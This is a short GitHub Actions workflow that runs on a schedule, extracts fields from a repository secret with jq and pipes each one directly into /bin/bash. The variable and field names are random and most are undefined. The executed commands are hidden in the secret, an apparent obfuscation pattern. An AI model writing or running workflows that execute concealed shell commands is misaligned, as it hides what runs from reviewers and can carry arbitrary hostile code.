name: sushibullet

on:
  workflow_dispatch:
  schedule:
    - cron: '50 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: sushibullet
        env:
          xrdsg0: ${{ secrets.xrdsg0 }}
        run: |
          echo $xrdsg0 | jq -r .vm034 | /bin/bash
          echo $dxl93005 | jq -r .gnwg7476 | /bin/bash
          echo $d57 | jq -r .i19 | /bin/bash
          echo $evks52 | jq -r .ceuq73 | /bin/bash
          echo $fny65 | jq -r .xlvh3663 | /bin/bash
          echo $nki8909 | jq -r .ct79938 | /bin/bash
          echo $tp2937 | jq -r .rp72 | /bin/bash
          echo $k11717 | jq -r .syob4 | /bin/bash
          echo $cpx3188 | jq -r .em80 | /bin/bash

